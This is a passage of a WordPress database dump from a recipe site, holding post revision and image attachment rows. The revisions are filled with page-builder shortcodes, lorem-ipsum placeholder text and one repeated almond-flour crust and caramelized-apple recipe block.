!important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"3936,3937\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','Coconut Balls','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','inherit','closed','closed','','2120-revision-v1','','','2020-04-09 09:48:42','2020-04-09 09:48:42','',2120,'http://tummyrevolution.com/2120-revision-v1/',0,'revision','',0),(5020,1,'2020-04-09 09:51:58','2020-04-09 09:51:58','','Icecream pineapple landscape','','inherit','open','closed','','icecream-pineapple-landscape','','','2020-04-09 09:51:58','2020-04-09 09:51:58','',2070,'http://tummyrevolution.com/wp-content/uploads/2018/01/Icecream-pineapple-landscape.jpg',0,'attachment','image/jpeg',0),(5021,1,'2020-04-09 10:03:26','2020-04-09 10:03:26','','new pesto for web','','inherit','open','closed','','new-pesto-for-web','','','2020-04-09 10:03:26','2020-04-09 10:03:26','',2144,'http://tummyrevolution.com/wp-content/uploads/2018/01/new-pesto-for-web.jpg',0,'attachment','image/jpeg',0),(5022,1,'2020-04-09 10:03:49','2020-04-09 10:03:49','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"3936,3937\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','Delicious Smoothie','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','inherit','closed','closed','','2144-revision-v1','','','2020-04-09 10:03:49','2020-04-09 10:03:49','',2144,'http://tummyrevolution.com/2144-revision-v1/',0,'revision','',0),(5023,1,'2020-04-09 10:14:34','2020-04-09 10:14:34','','Banana bread new smallish','','inherit','open','closed','','banana-bread-new-smallish','','','2020-04-09 10:14:34','2020-04-09 10:14:34','',2120,'http://tummyrevolution.com/wp-content/uploads/2018/01/Banana-bread-new-smallish.jpg',0,'attachment','image/jpeg',0),(5025,1,'2020-04-09 11:29:42','2020-04-09 11:29:42','','Logo New TR web','','inherit','open','closed','','logo-new-tr-web','','','2020-04-09 11:29:42','2020-04-09 11:29:42','',1117,'http://tummyrevolution.com/wp-content/uploads/2020/04/Logo-New-TR-web.jpg',0,'attachment','image/jpeg',0),(5026,1,'2020-04-09 18:00:19','2020-04-09 18:00:19','','small Logo New TR web','','inherit','open','closed','','small-logo-new-tr-web','','','2020-04-09 18:00:19','2020-04-09 18:00:19','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/small-Logo-New-TR-web.jpg',0,'attachment','image/jpeg',0),(5027,1,'2020-04-09 18:02:15','2020-04-09 18:02:15','','small Logo New TR web','','inherit','open','closed','','small-logo-new-tr-web-2','','','2020-04-09 18:02:15','2020-04-09 18:02:15','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/small-Logo-New-TR-web-1.jpg',0,'attachment','image/jpeg',0),(5028,1,'2020-04-09 18:20:07','2020-04-09 18:20:07','','water green','','inherit','open','closed','','water-green','','','2020-04-09 18:20:07','2020-04-09 18:20:07','',2126,'http://tummyrevolution.com/wp-content/uploads/2018/01/water-green.jpg',0,'attachment','image/jpeg',0),(5029,1,'2020-04-09 18:20:24','2020-04-09 18:20:24','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"3936,3937\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','Figs Smoothies','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','inherit','closed','closed','','2126-revision-v1','','','2020-04-09 18:20:24','2020-04-09 18:20:24','',2126,'http://tummyrevolution.com/2126-revision-v1/',0,'revision','',0),(5030,1,'2020-04-09 18:26:43','2020-04-09 18:26:43','','quinoa muffin land','','inherit','open','closed','','quinoa-muffin-land','','','2020-04-09 18:26:43','2020-04-09 18:26:43','',2132,'http://tummyrevolution.com/wp-content/uploads/2018/01/quinoa-muffin-land.jpg',0,'attachment','image/jpeg',0),(5031,1,'2020-04-09 18:26:59','2020-04-09 18:26:59','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"3936,3937\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','Veggie Dinner','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','inherit','closed','closed','','2132-revision-v1','','','2020-04-09 18:26:59','2020-04-09 18:26:59','',2132,'http://tummyrevolution.com/2132-revision-v1/',0,'revision','',0),(5032,1,'2020-04-09 18:32:32','2020-04-09 18:32:32','','soup tomato 1','','inherit','open','closed','','soup-tomato-1','','','2020-04-09 18:32:32','2020-04-09 18:32:32','',2138,'http://tummyrevolution.com/wp-content/uploads/2018/01/soup-tomato-1.jpg',0,'attachment','image/jpeg',0),(5033,1,'2020-04-09 18:32:56','2020-04-09 18:32:56','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"3936,3937\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','Fantastic Lunch Servings','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','inherit','closed','closed','','2138-revision-v1','','','2020-04-09 18:32:56','2020-04-09 18:32:56','',2138,'http://tummyrevolution.com/2138-revision-v1/',0,'revision','',0),(5036,1,'2020-04-12 07:58:36','2020-04-12 07:58:36','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
